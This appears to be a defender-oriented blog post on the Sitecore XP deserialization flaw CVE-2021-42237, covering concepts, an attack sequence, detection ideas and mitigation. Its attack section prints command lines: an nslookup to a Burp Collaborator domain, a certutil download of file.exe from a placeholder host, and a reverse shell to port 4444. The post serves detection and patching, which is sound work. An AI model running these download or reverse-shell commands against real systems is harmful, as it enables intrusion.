A Defender’s Perspective of Sitecore XP Deserialization RCE (CVE-2021–42237)
Sitecore’s Experience Platform (XP) is a .NET enterprise content management system (CMS). Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting.
CVE-2021–42237
Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
Key Concepts before getting started
Insecure Deserialization
Serialization is the conversion of an object into a static stream of bytes, which can be saved to a database or transfer over a network. Deserialization is the reverse of that process, reconstructing a data structure or object from a stream of bytes.
The vulnerability occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized.
When user-controllable data is deserialized by a website, this potentially enables an attacker to manipulate serialized objects to pass harmful data into the application code.
Web Shell
A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions.
IIS instance (w3wp.exe) running suspicious processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web-accessible folders is a rare event and is typically a strong sign of web shell activity.
Burp Collaborator
A network service that Burp Suite uses to help discover many kinds of vulnerabilities.
The Collaborator client can be used to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.
CertUtil
A Windows binary used for handling certificates.
The intended usage of certutil is to Dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components and verify certificates, key pairs, or certificate chains. But, it is possible to use the tool by attackers to fetch data from the Internet using a URL schema (ftp://, http://, etc).
How a typical attack would look like?
- Sitecore XP uses insecure deserialization in Report.ashx file which can be leveraged by an attacker to execute arbitrary code on the system
- Scanning attempts on the vulnerable server
URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx”3. nslookup from the endpoint towards burpcollaborator domain
nslookup 5ouceXYZQtem.burpcollaborator.net4. Payload download
“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.netcertutil -f -urlcache http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe
5. Reverse shell
C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmdBy successfully exploiting this vulnerability, an attacker can gain arbitrary code execution as the user who is running the IIS instance. The attacker can then use “getsystem” command to use RPCSS impersonation and get SYSTEM level code execution.
Ideas for Detection
- Suspicious usage of certutil
Identify certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. Link for Sigma rule. - Suspicious nslookup traffic
nslookup.exe execution and query towards *.burpcollaborator.net domain
Mitigation
The recommended solution is to upgrade to a secure version, ideally Sitecore XP 9.0 or higher. Alternatively, the flaw can be mitigated by deleting the Report.ashx file from “/sitecore/shell/ClientBin/Reporting/Report.ashx” on all server instances.
References
https://blog.assetnote.io/2021/11/02/sitecore-rce/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
https://lolbas-project.github.io/lolbas/Binaries/Certutil/
